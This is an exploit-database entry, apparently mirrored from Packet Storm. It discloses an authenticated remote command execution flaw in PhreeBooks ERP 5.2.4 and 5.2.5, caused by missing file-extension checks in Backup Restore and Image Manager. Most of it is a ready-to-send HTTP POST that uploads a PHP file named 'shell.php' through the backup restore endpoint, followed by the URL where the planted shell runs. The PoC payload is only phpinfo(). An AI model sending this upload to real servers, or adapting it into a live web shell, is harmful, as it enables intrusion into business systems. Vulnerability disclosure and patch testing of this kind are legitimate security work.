Exploit for PhreeBooks ERP 5.2.5 Remote Command Execution

## https://sploitus.com/exploit?id=PACKETSTORM:157555
# Exploit Title: PhreeBooks ERP 5.2.5 - Remote Command Execution  
# Date: 2020-05-01  
# Author: Besim ALTINOK  
# Vendor Homepage: https://www.phreesoft.com/  
# Software Link: https://sourceforge.net/projects/phreebooks/  
# Version: v5.2.4, v5.2.5  
# Tested on: Xampp  
# Credit: İsmail BOZKURT  
  
-------------------------------------------------------------------------------------  
  
There are no file extension controls on Image Manager (5.2.4) and on Backup  
Restore. If an authorized user is obtained, it is possible to run a  
malicious PHP file on the server.  
--------------------------------------------------------------------------------------  
  
One of the Vulnerable File: (backup.php)  
-----------------------------------------  
  
RCE PoC (Upload Process)  
--------------------------------------------------------------------------------------  
  
POST /pblast/index.php?&p=bizuno/backup/uploadRestore HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 *********************  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/pblast/index.php?&p=bizuno/backup/managerRestore  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------39525038724866743160620170  
Content-Length: 231  
DNT: 1  
Connection: close  
Cookie: **************************************************  
  
-----------------------------39525038724866743160620170  
Content-Disposition: form-data; name="fldFile"; filename="shell.php"  
Content-Type: text/php  
  
<? phpinfo(); ?>  
  
-----------------------------39525038724866743160620170--  
  
  
  
Shell directory:  
-------------------------------  
- http://localhost/pblast/myFiles/backups/shell.php